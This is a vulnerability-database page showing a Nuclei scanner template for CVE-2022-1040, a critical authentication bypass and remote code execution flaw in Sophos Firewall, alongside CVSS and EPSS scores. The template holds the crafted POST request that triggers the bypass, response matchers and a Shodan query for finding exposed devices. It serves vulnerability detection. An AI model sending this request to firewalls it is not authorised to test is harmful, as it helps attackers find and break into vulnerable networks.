Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-1040
HistoryMay 06, 2022 - 2:57 p.m.

Sophos Firewall <=18.5 MR3 - Remote Code Execution

2022-05-0614:57:40
ProjectDiscovery
github.com
27

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.974 High

EPSS

Percentile

99.9%

Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code.
id: CVE-2022-1040

info:
  name: Sophos Firewall <=18.5 MR3 - Remote Code Execution
  author: For3stCo1d
  severity: critical
  description: |
    Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the firewall.
  remediation: |
    Upgrade to a patched version of Sophos Firewall (>=18.5 MR4) to mitigate this vulnerability.
  reference:
    - https://github.com/killvxk/CVE-2022-1040
    - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1040
    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce
    - https://github.com/Mr-xn/Penetration_Testing_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1040
    cwe-id: CWE-287
    epss-score: 0.97434
    epss-percentile: 0.99939
    cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sophos
    product: sfos
    shodan-query: http.title:"Sophos"
  tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev

http:
  - method: POST
    path:
      - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}"

    headers:
      X-Requested-With: "XMLHttpRequest"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{\"status\":\"Session Expired\"}"

      - type: word
        part: header
        words:
          - "Server: xxxx"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f080aa3d8834e42afae528c892504c545864a4171a3a9942ab2a67b241c8cfc40220077fa609e7ee21031571a5fa2ca2d814a59157fd47ce39dc7ba4e6310900f35f:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.974 High

EPSS

Percentile

99.9%